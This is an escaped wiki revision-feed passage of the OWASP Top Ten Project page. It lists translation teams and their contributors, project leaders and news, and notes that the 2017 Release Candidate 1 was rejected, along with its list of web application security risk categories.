*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Efforts are already underway to translate the OWASP Top 10 for 2017. NOTE: This is still a '''release candidate''' so will definitely change before it's final. To avoid rework, you might want to wait until the final is released.If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please let me know you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint]. Please use this document as the basis for your translation efforts. &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231974</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231974"/>
				<updated>2017-08-02T21:17:21Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: more 2017 RC2 changes&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 - Industry survey open and data call reopened==&lt;br /&gt;
&lt;br /&gt;
The data call for the 2017 Top 10 has been reopened. All industry professionals are encouraged to complete [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 this survey] to help determine up to two items in the 2017 Top 10. Security analysts, pentesters, and security vendors can submit bulk data of their results at the [https://goo.gl/forms/tLgyvK9O74r7wMkt2 call for data]. This [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html OWASP blog posting] describes the process in detail. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – RC1 rejected==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ OWASP Summit 2017], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html outcomes of the OWASP Summit] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items&lt;br /&gt;
* Appeal for data and opinion is open until September 18, 2017 ([https://github.com/OWASP/Top10/issues submit here])&lt;br /&gt;
* The new OWASP Top 10 2017 is to be released in late November 2017.&lt;br /&gt;
* New project leadership put in place.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- I think it makes sense just to delete this text - Neil Smithline&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas (Data Analyst)]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
[https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 1 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
The following text is now outdated and has been left strictly for historical purposes.&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information==&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
